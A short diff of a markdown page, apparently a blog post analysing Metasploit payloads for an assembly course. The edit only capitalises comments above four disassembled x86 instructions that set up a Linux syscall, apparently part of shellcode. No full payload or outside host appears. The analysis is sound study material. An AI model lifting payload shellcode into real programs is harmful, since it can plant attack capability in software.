JakubHeba/jakubheba.github.io/SLAE/MSF-Payloads-Analysis/index.md

 ```nasm
 00000031  59                pop ecx
 ```
-- push the value 63 on the stack
+- Push the value 63 on the stack
 ```nasm
 00000032  6A3F              push byte +0x3f
 ```
-- pop the value 63 to the EAX registry
+- Pop the value 63 to the EAX registry
 ```nasm
 00000034  58                pop eax
 ```
-- syscall execution
+- Syscall execution
 ```nasm
 00000035  CD80              int 0x80
 ```